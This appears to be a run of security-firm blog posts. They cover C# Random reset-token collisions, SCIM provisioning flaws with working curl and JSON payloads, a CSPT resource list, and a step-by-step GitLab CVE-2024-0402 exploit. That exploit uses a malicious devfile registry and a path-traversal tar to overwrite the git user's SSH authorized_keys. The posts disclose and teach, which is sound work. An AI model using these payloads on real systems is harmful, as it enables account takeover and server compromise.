Exploiting random number generators requires math, right? Thanks to C#’s
Random
, that is not necessarily the case! I ran into an HTTP 2.0 web service
issuing password reset tokens from a custom encoding of (new Random()).Next(min, max)
output.
This led to a critical account takeover.
Exploitation did not require scripting, math or libraries. Just several clicks
in Burp. While I had source code, I will show a method of discovering and
exploiting this vulnerability in a black-box or bug-bounty style engagement.
The exploit uses no math, but I do like math. So, there is a bonus section on how to
optimize and invert Random
.
I can’t share the client code, but it was something like this:
var num = new Random().Next(min, max);
var token = make_password_reset_token(num);
save_reset_token_to_db(user, token);
return issue_password_reset(user.email, token);
This represents a typical password reset. The token is created using Random()
, and there is no
seed. This gets encoded to an alphanumeric token. The token is sent to the user
in email. The user can then log in with their email and token.
This may be trivially exploitable.
Somehow documentation linked me to the following reference implementation. This
is not the real implementation, but it’s good enough. Don’t get into
the weeds here, the Random(int Seed)
is only displayed for the sake of
context.
public Random()
: this(Environment.TickCount) {
}
public Random(int Seed) {
int ii;
int mj, mk;
//Initialize our Seed array.
//This algorithm comes from Numerical Recipes in C (2nd Ed.)
int subtraction = (Seed == Int32.MinValue) ? Int32.MaxValue : Math.Abs(Seed);
mj = MSEED - subtraction;
SeedArray[55]=mj; // [2]
mk=1;
for (int i=1; i<55; i++) { //Apparently the range [1..55] is special (Knuth) and so we're wasting the 0'th position.
ii = (21*i)%55;
SeedArray[ii]=mk;
mk = mj - mk;
if (mk<0) mk+=MBIG;
mj=SeedArray[ii];
}
for (int k=1; k<5; k++) {
for (int i=1; i<56; i++) {
SeedArray[i] -= SeedArray[1+(i+30)%55];
if (SeedArray[i]<0) SeedArray[i]+=MBIG;
}
}
inext=0;
inextp = 21;
Seed = 1;
}
This whole system hinges on the 32 bit Seed
. This builds the internal state
(SeedArray[55]
) with some ugly math. If Random
is initialized without an
argument, the Environment.TickCount
is used as Seed
. All output of a PRNG
is determined by its seed. In this case, it’s the
TickCount
In some sense, you can even submit a time to encode. You do this, not with a URL parameter but by waiting. Wait for the right time and you get the encoding you want. What time, or event, should we wait for?
The documentation says it best.
In .NET Framework, the default seed value is derived from the system clock, which has finite resolution. As a result, different
Random
objects that are created in close succession by a call to the parameterless constructor have identical default seed values and, therefore, produce identical sets of random numbers.
If we submit two requests in the same 1ms window, we get the same Seed
, same
seed same output, same reset token sent to two email addresses. One email we own
of course, the other belongs to an admin.
How do we hit the 1ms window? We use the single packet attack.
Will it really work though?
You don’t want to go spamming admins with reset emails before you even verify the vulnerability. So make two accounts on the website that you control. While you can do the attack with one account, it’s prone to false positives. You’re sending two account resets in rapid succession. The second request may write a different reset token to the DB before the email service reads the first, resulting in a false positive.
Use Burp’s repeater groups to perform the single packet attack to reset both accounts. Check your email for duplicate tokens. If you fail, go on testing other stuff until the lockout window dies. Then just hit send again, likely you don’t need to worry about keeping a session token alive.
Note: Burp displays round trip time in the lower-right corner of Repeater.
Keep an eye on that number. Each request has its own time. For me, it took about 10 requests before I got a duplicate token. That only occurred when the difference in round trip times was 1ms or less.
When launching the actual exploit, the only way to check if your token matches the victim account’s, is to log in. Login requests tend to be rate limited and guarded. So first verify with testing accounts. Use that to obtain a delta time window that works. Then, when launching the actual exploit, only attempt to log in when the delta time is within your testing bounds.
Ah… I guess subtracting two times counts as math. Exploiting PRNG’s always require math.
This attack is not completely novel. I have seen similar attacks used in CTF’s. It’s a nice lesson on time though. We control time by waiting, or not waiting. If a secret token is just an encoded time, you can duplicate them by duplicating time.
If you look into the .NET runtime enough, you can convince yourself this attack
won’t work. Random
has more then one implementation, the one my client should
of used does not seed by
time.
I can even prove this with dotnetfiddle.
This is like the security version of “it works on my computer”. This is why we
test “secure” code and why we fuzz with random input. So try this exploit next
time you see a security token.
This applies to more then just C#’s Random
. Consider python’s uuid
?
The documentation warns of potential
collisions due to lack of “synchronization” depending on “underlying platform”,
unless safeUUID
is used. I wonder if the attack will work there? Only one way
to find out.
The fix for weak PRNG vulnerabilities is always to check the documentation. In this case you have to click the “Supplemental API remarks for Random.” in the “Remarks” section to get to the security info where it says:
To generate a cryptographically secure random number, such as one that’s suitable for creating a random password, use one of the static methods in the System.Security.Cryptography.RandomNumberGenerator class`.
So C# use RandomNumberGenerator
instead of Random
.
Ahead is some math. It’s not too bad, but figured I would warn you. This is the
“hard” way to exploit this finding. I wrote a library that can predict the
output of Random::Next
. It can also invert it, to go back to the seed. Or you
can find the first output from the seventh output. None of this requires brute
force, just a single modular equation. The code can be found here.
I intended this to be a fun weekend math project. Things got messed up when I found collisions due to an int underflow.
Let’s look at the seed algorithm, but try to generalize what you see. The
SeedArray[55]
is obviously the internal state of the PRNG. This is built up
with “math”. If you look closely, almost every time SeedArray[i]
is
assigned, it’s with a subtraction. Right afterward you always see a check, did
the subtraction results in a negative number? If so, add MBIG
. In other words,
all the subtraction is done mod MBIG
.
The MBIG
value is Int32.MaxValue
, aka 0x7fffffff, aka 2^31 - 1
. This is a
Mersenne prime. Doing math, mod’ing
a prime results in what math people call a Galois field.
We only say that because Évariste
Galois was so cool. A
Galois field is just a nice way of saying “we can do all the normal algebra
tricks we learned since middle school, even though this isn’t normal math”.
So, lets say SeedArray[i]
is some a*Seed + b mod MBIG
. It gets changed in a
loop though by subtracting some other c*Seed + d mod MBIG
. We don’t need that
loop - algebra says to just (a+c)*Seed + (b+d) Mod MBIG
. By churning through
the loop doing algebra you can get every element of SeedArray
in the form
of a*Seed + b mod MBIG
Every time the PRNG is sampled, Random::InternalSample
is called. That is
just another subtraction. The result is both returned and used to set some
element of SeedArray
. It’s just some equation again. It’s still in the Galois
field, it’s still just algebra and you can invert all of these equations. Given
one output of Random::Next
we can invert the corresponding equation and get
the original Seed
.
But, we can do more too!
The library I made builds SeedArray
from these equations. It will output in
terms of these equations. Let’s get the equation that represents the first
output of Random
for any Seed
:
>>> from csharp_rand import csharp_rand
>>> cs = csharp_rand()
>>> first = cs.sample_equation(0)
>>> print(first)
rand = seed * 1121899819 + 1559595546 mod 2147483647
This represents the first output of Random
for any seed
. Use .resolve(42)
to get the output of new Random(42).Next()
.
>>> first.resolve(42)
1434747710
Or invert and resolve 1434747710
to find out what seed will produce
1434747710
for the first output of Random
.
>>> first.invert().resolve(1434747710)
42
This agrees with (dotnetfiddle).
See the readme for more complicated examples.
Having just finished my library, I excitedly showed it to the first person who would listen to me. Of course it failed. There must be a bug and of course I blamed the original implementation. But since account takeover bugs don’t care about my feelings, I fixed the code… mostly…
In short, the original implementation has an int underflow which throws the
math equations off for certain seed values. Only certain SeedArray
elements
are affected. For example, the following shows the first output of Random
does not need any adjustment, but 13th output does.
>>> print(cs.sample_equation(0))
rand = seed * 1121899819 + 1559595546 mod 2147483647
>>> print(cs.sample_equation(12))
rand = seed * 1476289907 + 1358625013 mod 2147483647 underflow adjustment: -2
So the 13th output will be seed * 1476289907 + 1358625013
, unless the seed
causes an underflow, then it will be off by -2
. The code attempts to decide
if the overflow occurs itself. This works great until you invert things.
Consider, what seed value will produce 908112456 as the 13th output of
Random::Next
?
>>> cs.sample_equation(12).invert().resolve2(908112456)
(619861032, 161844078)
Both seeds, 619861032 and 161844078, will produce 908112456 on the 13th output
(poc). Seed 619861032 does it the proper
way, from the non-adjusted equation. Seed 619861032 gets there from the
underflow. This “collision” means there are exactly 2 seeds that produce the
same output. This means 908112456 is 2x more likely to occur on the 13th output
then the first. It also means there is no seed that will produce 908112458 on
the 13th output of Random
. A quick brute force produced some 80K+ other
“collision” just like this one.
Sometimes the smart way is dumb. What started as a fun math thing ended up
feeling like death by a thousand cuts. It’s better to version match and
language match your exploit and get it going fast. If it takes a long time,
start optimizing while it’s still running. But before you optimize, TEST! Test
everything! Otherwise you will run a brute force for hours and get nothing.
Why? well maybe Random(Environment.TickCount)
is not Random()
because
explicitly seeding results in a different algorithm!
Ugh…. I am going to go audit some more
endpoints…
Single Sign-On (SSO) related bugs have gotten an incredible amount of hype and a lot of amazing public disclosures in recent years. Just to cite a few examples:
And so on - there is a lot of gold out there.
Not surprisingly, systems using a custom implementation are the most affected since integrating SSO with a platform’s User object model is not trivial.
However, while SSO often takes center stage, another standard is often under-tested - SCIM (System for Cross-domain Identity Management). In this blogpost we will dive into its core aspects & the insecure design issues we often find while testing our clients’ implementations.
SCIM is a standard designed to automate the provisioning and deprovisioning of user accounts across systems, ensuring access consistency between the connected parts.
The standard is defined in the following RFCs: RFC7642, RFC7644, RFC7643.
While it is not specifically designed to be an IdP-to-SP protocol, rather a generic user pool syncing protocol for cloud environments, real-world scenarios mostly embed it in the IdP-SP relationship.
To make a long story short, the standard defines a set of RESTful APIs exposed by the Service Providers (SP) which should be callable by other actors (mostly Identity Providers) to update the users pool.
It provides REST APIs with the following set of operations to edit the managed objects (see scim.cloud):
https://example-SP.com/{v}/{resource}
https://example-SP.com/{v}/{resource}/{id}
https://example-SP.com/{v}/{resource}/{id}
https://example-SP.com/{v}/{resource}/{id}
https://example-SP.com/{v}/{resource}/{id}
https://example-SP.com/{v}/{resource}?<SEARCH_PARAMS>
https://example-SP.com/{v}/Bulk
So, we can summarize SCIM as a set APIs usable to perform CRUD operations on a set of JSON encoded objects representing user identities.
Core Functionalities
If you want to look into a SCIM implementation for bugs, here is a list of core functionalities that would need to be reviewed during an audit:
& ||
safety checks.internal
attributes that should not be user-controlled, platform-specific attributes not allowed in SCIM, etc.email
update should trigger a confirmation flow / flag the user as unconfirmed, username
update should trigger ownership / pending invitations / re-auth checks and so on.As direct IdP-to-SP communication, most of the resulting issues will require a certain level of access either in the IdP or SP. Hence, the complexity of an attack may lower most of your findings. Instead, the impact might be skyrocketing in Multi-tenant Platforms where SCIM Users may lack tenant-isolation logic common.
The following are some juicy examples of bugs you should look for while auditing SCIM implementations.
A few months ago we published our advisory for an Unauthenticated SCIM Operations In Casdoor IdP Instances. It is an open-source identity solution supporting various auth standards such as OAuth, SAML, OIDC, etc. Of course SCIM was included, but as a service, meaning the Casdoor (IdP) would also allow external actors to manipulate its users pool.
Casdoor utilized the elimity-com/scim library, which, by default, does not include authentication in its configuration as per the standard. Consequently, a SCIM server defined and exposed using this library remains unauthenticated.
server := scim.Server{
Config: config,
ResourceTypes: resourceTypes,
}
Exploiting an instance required emails matching the configured domains. A SCIM POST operation was usable to create a new user matching the internal email domain and data.
➜ curl --path-as-is -i -s -k -X $'POST' \
-H $'Content-Type: application/scim+json'-H $'Content-Length: 377' \
--data-binary $’{\"active\":true,\"displayName\":\"Admin\",\"emails\":[{\"value\":
\"admin2@victim.com\"}],\"password\":\"12345678\",\"nickName\":\"Attacker\",
\"schemas\":[\"urn:ietf:params:scim:schemas:core:2.0:User\",
\"urn:ietf:params:scim:schemas:extension:enterprise:2.0:User\"],
\"urn:ietf:params:scim:schemas:extension:enterprise:2.0:User\":{\"organization\":
\"built-in\"},\"userName\":\"admin2\",\"userType\":\"normal-user\"}' \
$'https://<CASDOOR_INSTANCE>/scim/Users'
Then, authenticate to the IdP dashboard with the new admin user admin2:12345678
.
Note: The maintainers released a new version (v1.812.0), which includes a fix.
While that was a very simple yet critical issue, bypasses could be found in authenticated implementations. In other cases the service could be available only internally and unprotected.
[*] IdP-Side Issues
Since SCIM secrets allow dangerous actions on the Service Providers, they should be protected from extractions happening after the setup. Testing or editing an IdP SCIM integration on a configured application should require a new SCIM token in input, if the connector URL differs from the one previously set.
A famous IdP was found to be issuing the SCIM integration test requests to /v1/api/scim/Users?startIndex=1&count=1
with the old secret while accepting a new baseURL
.
+1 Extra - Covering traces: Avoid logging errors by mocking a response JSON with the expected data for a successful SCIM integration test.
An example mock response’s JSON for a Users
query:
{
"Resources": [
{
"externalId": "<EXTID>",
"id": "francesco+scim@doyensec.com",
"meta": {
"created": "2024-05-29T22:15:41.649622965Z",
"location": "/Users/francesco+scim@doyensec.com",
"version": "<VERSION"
},
"schemas": [
"urn:ietf:params:scim:schemas:core:2.0:User"
],
"userName": "francesco+scim@doyensec.com"
}
],
"itemsPerPage": 2,
"schemas": [
"urn:ietf:params:scim:api:messages:2.0:ListResponse"
],
"startIndex": 1,
"totalResults": 8
}
[*] SP-Side Issues
The SCIM token creation & read should be allowed only to highly privileged users. Target the SP endpoints used to manage it and look for authorization issues or target it with a nice XSS or other vulnerabilities to escalate the access level in the platform.
Since ~real-time user access management is the core of SCIM, it is also worth looking for fallbacks causing a deprovisioned user to be back with access to the SP.
As an example, let’s look at the update_scimUser
function below.
def can_be_reprovisioned?(usrObj)
return true if usrObj.respond_to?(:active) && !usrObj.active?
false
def update_scimUser(usrObj)
# [...]
if parser.deprovision_user?
# [...]
# (o)__(o)'
elsif can_be_reprovisioned?(usrObj)
reprovision(usrObj)
else
true
end
end
Since respond_to?(:active)
is always true
for SCIM identities. If the user is not active, the condition !identity.active?
will always be true and cause the re-provisioning.
Consequently, any SCIM update request (e.g., change lastname) will fallback to re-provisioning if the user was not active for any reason (e.g., logical ban, forced removal).
While outsourcing identity syncing to SCIM, it becomes critical to choose what will be copied from the SCIM objects into the new internal ones, since bugs may arise from an “excessive” attribute allowance.
[*] Example 1 - Privesc To Internal Roles
A client supported Okta Groups and Users to be provisioned and updated via SCIM endpoints.
It converted Okta Groups into internal roles with custom labeling to refer to “Okta resources”. In particular, the function resource_to_access_map
constructed an unvalidated access mapping from the supplied SCIM group resource.
[...]
group_data, decode_error := decode_group_resource(resource.Attributes.AsMap())
var role_list []string
// (o)__(o)'
if resource.Id != "" {
role_list = []string{resource.Id}
}
//...
return access_map, nil, nil
The implementation issue resided in the fact that the role names in role_list
were constructed on an Id
attribute (urn:ietf:params:scim:schemas:core:2.0:Group
) passed from a third-party source.
Later, another function upserted the Role
objects, constructed from the SCIM event, without further checks. Hence, it was possible to overwrite any existing resource in the platform by matching its name in a SCIM Group ID.
As an example, if the SCIM Group resource ID was set to an internal role name, funny things happened.
POST /api/scim/Groups HTTP/1.1
Host: <PLATFORM>
Content-Type: application/json; charset=utf-8
Authorization: Bearer 650…[REDACTED]…
…[REDACTED]…
Content-Length: 283
{
"schemas": [“urn:ietf:params:scim:schemas:core:2.0:Group"],
"id":"superadmin",
"displayName": "TEST_NAME",
"members": [{
"value": "francesco@doyensec.com",
"display": "francesco@doyensec.com"
}]
}
The platform created an access map named TEST_NAME
, granting the superadmin
role to members.
[*] Example 2 - Mass Assignment In SCIM-To-User Mapping
Other internal attributes manipulation may be possible depending on the object mapping strategy. A juicy example could look like the one below.
SSO_user.update!(
external_id: scim_data["externalId"],
# (o)__(o)'
userData: Oj.load(scim_req_body),
)
Even if Oj
defaults are overwritten (sorry, no deserialization) it could still be possible to put any data in the SCIM request and have it accessible through userData
. The logic is assuming it will only contain SCIM attributes.
This category contains all the bugs arising from required internal user-management processes not being applied to updates caused by SCIM events (e.g., email
/ phone
/ userName
verification).
An interesting related finding is Gitlab Bypass Email Verification (CVE-2019-5473). We have found similar cases involving the bypass of a code verification processes during our assessments as well.
[*] Example - Same-Same But With Code Bypass
A SCIM email change did not trigger the typical confirmation flow requested with other email change operations.
Attackers could request a verification code to their email, change the email to a victim one with SCIM, then redeem the code and thus verify the new email address.
PATCH /scim/v2/<ATTACKER_SAML_ORG_ID>/<ATTACKER_USER_SCIM_ID> HTTP/2
Host: <CLIENT_PLATFORM>
Authorization: Bearer <SCIM_TOKEN>
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Content-Length: 205
{
"schemas": ["urn:ietf:params:scim:api:messages:2.0:PatchOp"],
"Operations": [
{
"op": "replace",
"value": {
"userName": "<VICTIM_ADDRESS>"
}
}
]
}
In multi-tenant platforms, the SSO-SCIM identity should be linked to an underlying user object. While it is not part of the RFCs, the management of user attributes such as userName
and email
is required to eventually trigger the platform’s processes for validation and ownership checks.
A public example case where things did not go well while updating the underlying user is CVE-2022-1680 - Gitlab Account take over via SCIM email change. Below is a pretty similar instance discovered in one of our clients.
[*] Example - Same-Same But Different
A client permitted SCIM operations to change the email of the user and perform account takeover.
The function set_username
was called every time there was a creation or update of SCIM users.
#[...]
underlying_user = sso_user.underlying_user
sso_user.scim["userName"] = new_name
sso_user.username = new_name
tenant = Tenant.find(sso_user.id)
underlying_user&.change_email!(
new_name,
validate_email: tenant.isAuthzed?(new_name)
)
def underlying_user
return nil if !tenant.isAuthzed?(self.username)
# [...]
# (o)__(o)'
@underlying_user = User.find_by(email: self.username)
end
The underlying_user
should be nil
, hence blocking the change, if the organization is not entitled to manage the user according to isAuthzed
. In our specific case, the authorization function did not protect users in a specific state from being taken over. SCIM could be used to forcefully change the victim user’s email and take over the account once it was added to the tenant. If combined with the classic “Forced Tenant Join” issue, a nice chain could have been made.
Moreover, since the platform did not protect against multi-SSO context-switching, once authenticated with the new email, the attacker could have access to all other tenants the user was part of.
As per rfc7644, the Path attribute is defined as:
The “path” attribute value is a String containing an attribute path describing the target of the operation. The “path” attribute is OPTIONAL for “add” and “replace” and is REQUIRED for “remove” operations.
As the path
attribute is OPTIONAL, the nil
possibility should be carefully managed when it is part of the execution logic.
def exec_scim_ops(scim_identity, operation)
path = operation["path"]
value = operation["value"]
case path
when "members"
# [...]
when "externalId"
# [...]
else
# semi-Catch-All Logic!
end
end
Putting a catch-all default could allow another syntax of PatchOp
messages to still hit one of the restricted cases while skipping the checks. Here is an example SCIM request body that would skip the externalId
checks and edit it within the context above.
{
"schemas": ["urn:ietf:params:scim:api:messages:2.0:PatchOp"],
"Operations": [
{
"op": "replace",
"value": {
"externalId": "<ID_INJECTION>"
}
}
]
}
The value
of an op
is allowed to contain a dict of <Attribute:Value>
.
Since bulk operations may be supported (currently very few cases), there could be specific issues arising in those implementations:
Race Conditions - the ordering logic could not include reasoning about the extra processes triggered in each step
Missing Circular References Protection - The RFC7644 is explicitly talking about Circular Reference Processing (see example below).
Since SCIM adopts JSON for data representation, JSON interoperability attacks could lead to most of the issues described in the hunting list. A well-known starting point is the article: An Exploration of JSON Interoperability Vulnerabilities .
Once the parsing lib used in the SCIM implementation is discovered, check if other internal logic is relying on the stored JSON serialization while using a different parser for comparisons or unmarshaling.
Despite being a relatively simple format, JSON parser differentials could lead to interesting cases - such as the one below:
As an extension of SSO, SCIM has the potential to enable critical exploitations under specific circumstances. If you’re testing SSO, SCIM should be in scope too!
Finally, most of the interesting vulnerabilities in SCIM implementations require a deep understanding of the application’s authorization and authentication mechanisms. The real value lies in identifying the differences between SCIM objects and the mapped internal User objects, as these discrepancies often lead to impactful findings.
As a follow up to Maxence Schmitt’s research on Client-Side Path Traversal (CSPT), we wanted to encourage researchers, bug hunters, and security professionals to explore CSPT further, as it remains an underrated yet impactful attack vector.
To support the community, we have compiled a list of blog posts, vulnerabilities, tools, CTF challenges, and videos related to CSPT. If anything is missing, let us know and we will update the post. Please note that the list is not ranked and does not reflect the quality or importance of the resources.
We hope this collection of resources will help the community to better understand and explore Client-Side Path Traversal (CSPT) vulnerabilities. We encourage anyone interested to take a deep dive into exploring CSPT techniques and possibilities and helping us to push the boundaries of web security. We wish you many exciting discoveries and plenty of CSPT-related bugs along the way!
This research project was made with ♡ by Maxence Schmitt, thanks to the 25% research time Doyensec gives its engineers. If you would like to learn more about our work, check out our blog, follow us on X, Mastodon, BlueSky or feel free to contact us at info@doyensec.com for more information on how we can help your organization “Build with Security”.
I know, we have written it multiple times now, but in case you are just tuning in, Doyensec had found themselves on a cruise ship touring the Mediterranean for our company retreat. To kill time between parties, we had some hacking sessions analyzing real-world vulnerabilities resulting in the !exploitable blogpost series.
In Part 1 we covered our journey into IoT ARM exploitation, while Part 2 followed our attempts to exploit the bug used by Trinity in The Matrix Reloaded movie.
For this episode, we will dive into the exploitation of CVE-2024-0402 in GitLab. Like an onion, there is always another layer beneath the surface of this bug, from YAML parser differentials to path traversal in decompression functions in order to achieve arbitrary file write in GitLab.
No public Proof Of Concept was published and making it turned out to be an adventure, deserving an extension of the original author’s blogpost with the PoC-related info to close the circle 😉
This vulnerability impacts the GitLab Workspaces functionality. To make a long story short, it lets developers instantly spin up integrated development environments (IDE) with all dependencies, tools, and configurations ready to go.
The whole Workspaces functionality relies on several components, including a running Kubernetes GitLab Agent and a devfile configuration.
Kubernetes GitLab Agent: The Kubernetes GitLab Agent connects GitLab to a Kubernetes cluster, allowing users to enable deployment process automations and making it easier to integrate GitLab CI/CD pipelines. It also allows Workspaces creation.
Devfile: It is an open standard defining containerized development environments. Let’s start by saying it is configured with YAML files used to define the tools, runtime, and dependencies needed for a certain project.
Example of a devfile configuration (to be placed in the GitLab repository as .devfile.yaml
):
apiVersion: 1.0.0
metadata:
name: my-app
components:
- name: runtime
container:
image: registry.access.redhat.com/ubi8/nodejs-14
endpoints:
- name: http
targetPort: 3000
Let’s start with the publicly available information enriched with extra code-context.
GitLab was using the devfile
Gem (Ruby of course) making calls to the external devfile
binary (written in Go) in order to process the .devfile.yaml
files during Workspace creation in a specific repository.
During the devfile pre-processing routine applied by Workspaces, a specific validator named validate_parent
was called by PreFlattenDevfileValidator
in GitLab.
# gitlab-v16.8.0-ee/ee/lib/remote_development/workspaces/create/pre_flatten_devfile_validator.rb:50
...
def self.validate_parent(value)
value => { devfile: Hash => devfile }
return err(_("Inheriting from 'parent' is not yet supported")) if devfile['parent']
Result.ok(value)
end
...
But what is the parent
option? As per the Devfile documentation:
If you designate a parent devfile, the given devfile inherits all its behavior from its parent. Still, you can use the child devfile to override certain content from the parent devfile.
Then, it proceeds to describe three types of parent
references:
As with any other remote fetching functionality, it would be worth reviewing to find bugs. But at first glance the option seems to be blocked by validate_parent
.
As widely known, even the most used implementations of specific standards may have minor deviations from what was defined in the specification. In this specific case, a YAML parser differential between Ruby and Go was needed.
The author blessed us with a new trick for our differentials notes. In the YAML Spec:
!
is used for custom or application-specific data types
my_custom_data: !MyType "some value"
!!
is used for built-in YAML types
bool_value: !!bool "true"
He found out that the local YAML tags notation !
(RFC reference) is still activating the binary
format base64 decoding in the Ruby yaml
lib, while the Go gopkg.in/yaml.v3
is just dropping it, leading to the following behavior:
➜ cat test3.yaml
normalk: just a value
!binary parent: got injected
### valid parent option added in the parsed version (!binary dropped)
➜ go run g.go test3.yaml
parent: got injected
normalk: just a value
### invalid parent option as Base64 decoded value (!binary evaluated)
➜ ruby -ryaml -e 'x = YAML.safe_load(File.read("test3.yaml"));puts x'
{"normalk"=>"just a value", "\xA5\xAA\xDE\x9E"=>"got injected"}
Consequently, it was possible to pass GitLab a devfile with a parent
option through validate_parent
function and reach the devfile
binary execution with it.
At this point, we need to switch to a bug discovered in the devfile
binary (Go implementation).
After looking into a dependency of a dependency of a dependency, the hunter got his hands on the decompress
function. This was taking tar.gz archives from the registry’s library and extracting the files inside the GitLab server. Later, it should then move them into the deployed Workspace environment.
Here is the vulnerable decompression function used by getResourcesFromRegistry
:
// decompress extracts the archive file
func decompress(targetDir string, tarFile string, excludeFiles []string) error {
var returnedErr error
reader, err := os.Open(filepath.Clean(tarFile))
...
gzReader, err := gzip.NewReader(reader)
...
tarReader := tar.NewReader(gzReader)
for {
header, err := tarReader.Next()
...
target := path.Join(targetDir, filepath.Clean(header.Name))
switch header.Typeflag {
...
case tar.TypeReg:
/* #nosec G304 -- target is produced using path.Join which cleans the dir path */
w, err := os.OpenFile(target, os.O_CREATE|os.O_RDWR, os.FileMode(header.Mode))
if err != nil {
returnedErr = multierror.Append(returnedErr, err)
return returnedErr
}
/* #nosec G110 -- starter projects are vetted before they are added to a registry. Their contents can be seen before they are downloaded */
_, err = io.Copy(w, tarReader)
if err != nil {
returnedErr = multierror.Append(returnedErr, err)
return returnedErr
}
err = w.Close()
if err != nil {
returnedErr = multierror.Append(returnedErr, err)
return returnedErr
}
default:
log.Printf("Unsupported type: %v", header.Typeflag)
}
}
return nil
}
The function opens tarFile
and iterates through its contents with tarReader.Next()
. Only contents of type tar.TypeDir
and tar.TypeReg
are processed, preventing symlink and other nested exploitations.
Nevertheless, the line target := path.Join(targetDir, filepath.Clean(header.Name))
is vulnerable to path traversal for the following reasons:
header.Name
comes from a remote tar archive served by the devfile registryfilepath.Clean
is known for not preventing path traversals on relative paths (../
is not removed)The resulting execution will be something like:
fmt.Println(filepath.Clean("/../../../../../../../tmp/test")) // absolute path
fmt.Println(filepath.Clean("../../../../../../../tmp/test")) // relative path
//prints
/tmp/test
../../../../../../../tmp/test
There are plenty of scripts to create a valid PoC for an evil archive exploiting such directory traversal pattern (e.g., evilarc.py).
devfile
lib fetching files from a remote registry allowed a devfile registry containing a malicious .tar
archive to write arbitrary files within the devfile client system.devfile.yaml
definition including the parent
option that will force the GitLab server to use the malicious registry, hence triggering the arbitrary file write on the server itselfThe requirements to exploit this vuln are:
To ensure you have the full picture, I must tell you what it’s like to configure Workspaces in GitLab, with slow internet while being on a cruise 🌊 - an absolute nightmare!
Of course, there are the docs on how to do so, but today you will be blessed with some extra finds:
web-ide-injector
container image.
ubuntu@gitlabServer16.8:~$ find / -name "editor_component_injector.rb" 2>/dev/null
/opt/gitlab/embedded/service/gitlab-rails/ee/lib/remote_development/workspaces/create/editor_component_injector.rb
Replace the value at line 129 of the web-ide-injector
image with:
registry.gitlab.com/gitlab-org/gitlab-web-ide-vscode-fork/gitlab-vscode-build:latest
remote_development
option to allow Workspaces.config.yaml
file for it
remote_development:
enabled: true
dns_zone: "workspaces.gitlab.yourdomain.com"
observability:
logging:
level: debug
grpc_level: warn
May the force be with you while configuring it.
As previously stated, this bug chain is layered like an onion. Here is a classic 2025 AI generated image sketching it for us:
The publicly available information left us with the following tasks if we wanted to exploit it:
.devfile.yaml
pointing to it in a target GitLab repositoryIn order to find out where the malicious.tar belonged, we had to take a step back and read some more code.
In particular, we had to understand the context in which the vulnerable decompress
function was being called.
We ended up reading PullStackByMediaTypesFromRegistry
, a function used to pull a specified stack with allowed media types from a given registry URL to some destination directory.
See at library.go:293
func PullStackByMediaTypesFromRegistry(registry string, stack string, allowedMediaTypes []string, destDir string, options RegistryOptions) error {
//...
//Logic to Pull a stack from registry and save it to disk
//...
// Decompress archive.tar
archivePath := filepath.Join(destDir, "archive.tar")
if _, err := os.Stat(archivePath); err == nil {
err := decompress(destDir, archivePath, ExcludedFiles)
if err != nil {
return err
}
err = os.RemoveAll(archivePath)
if err != nil {
return err
}
}
return nil
}
The code pattern highlighted that devfile registry stacks were involved and that they included some archive.tar file in their structure.
Why should a devfile stack contain a tar?
An archive.tar file may be included in the package to distribute starter projects or pre-configured application templates. It helps developers quickly set up their workspace with example code, configurations, and dependencies.
A few quick GitHub searches in the devfile registry building process revealed that our target .tar file should be placed within the registry project under stacks/<STACK_NAME>/<STACK_VERSION>/archive.tar
in the same directory containing the devfile.yaml
for the specific version being deployed.
As a result, the destination for the path-traversal tar in our custom registry is:
malicious-registry/stacks/nodejs/2.2.1/archive.tar
It required some extra work to build our custom registry (couldn’t make the building scripts work, had to edit them), but we eventually managed to place our archive.tar
(e.g., created using evilarc.py) in the right spot and craft a proper index.json
to serve it. The final reusable structure can be found in our PoC repository, so save yourself some time to build the devfile registry image.
Commands to run the malicious registry:
docker run -d -p 5000:5000 --name local-registrypoc registry:2
to serve a local container registry that will be used by the devfile registry to store the actual stack (see yellow highlight)docker run --network host devfile-index
to run the malicious devfile registry built with the official repository. Find it in our PoC repository
Once you have a running registry reachable by the target GitLab instance, you just have to authenticate in GitLab as developer and edit the .devfile.yaml
of a repository to point it by exploiting the YAML parser differential shown before.
Here is an example you can use:
schemaVersion: 2.2.0
!binary parent:
id: nodejs
registryUrl: http://<YOUR_MALICIOUS_REGISTRY>:<PORT>
components:
- name: development-environment
attributes:
gl/inject-editor: true
container:
image: "registry.gitlab.com/gitlab-org/gitlab-build-images/workspaces/ubuntu-24.04:20250109224147-golang-1.23@sha256:c3d5527641bc0c6f4fbbea4bb36fe225b8e9f1df69f682c927941327312bc676"
To trigger the file-write, just start a new Workspace in the edited repo and wait.
Nice! We have successfully written Hello CVE-2024-0402!
in /tmp/plsWorkItsPartyTime.txt
.
We got the write, but we couldn’t stop there, so we investigated some reliable ways to escalate it.
First things first, we checked the system user performing the file write using a session on the GitLab server.
/tmp$ ls -lah /tmp/plsWorkItsPartyTime.txt
-rw-rw-r-- 1 git git 21 Mar 10 15:13 /tmp/plsWorkItsPartyTime.txt
Apparently, our go-to user is git
, a pretty important user in the GitLab internals.
After inspecting writeable files for a quick win, we found out it seemed hardened without tons of editable config files, as expected.
...
/var/opt/gitlab/gitlab-exporter/gitlab-exporter.yml
/var/opt/gitlab/.gitconfig
/var/opt/gitlab/.ssh/authorized_keys
/opt/gitlab/embedded/service/gitlab-rails/db/main_clusterwide.sql
/opt/gitlab/embedded/service/gitlab-rails/db/ci_structure.sql
/var/opt/gitlab/git-data/repositories/.gitaly-metadata
...
Some interesting files were waiting to be overwritten, but you may have noticed the quickest yet not honorable entry: /var/opt/gitlab/.ssh/authorized_keys
.
Notably, you can add an SSH key to your GitLab account and then use it to SSH as git
to perform code-related operations. The authorized_keys
file is managed by the GitLab Shell, which adds the SSH Keys from the user profile and forces them into a restricted shell to further manage/restrict the user access-level.
Here is an example line added to the authorized keys when you add your profile SSH key in GitLab:
command="/opt/gitlab/embedded/service/gitlab-shell/bin/gitlab-shell key-1",no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty ssh-ed25519 AAAAC3...[REDACTED]
Since we got arbitrary file write, we can just substitute the authorized_keys
with one containing a non-restricted key we can use. Back to our exploit prepping, create a new .tar ad-hoc for it:
## write a valid entry in a local authorized_keys for one of your keys
➜ python3 evilarc.py authorized_keys -f archive.tar.gz -p var/opt/gitlab/.ssh/ -o unix
At this point, substitute the archive.tar
in your malicious devfile registry, rebuild its image and run it. When ready, trigger the exploit again by creating a new Workspace in the GitLab Web UI.
After a few seconds, you should be able to SSH as an unrestricted git
user.
Below we also show how to change the GitLab Web root
user’s password:
➜ ssh -i ~/.ssh/gitlab2 git@gitinstance.local
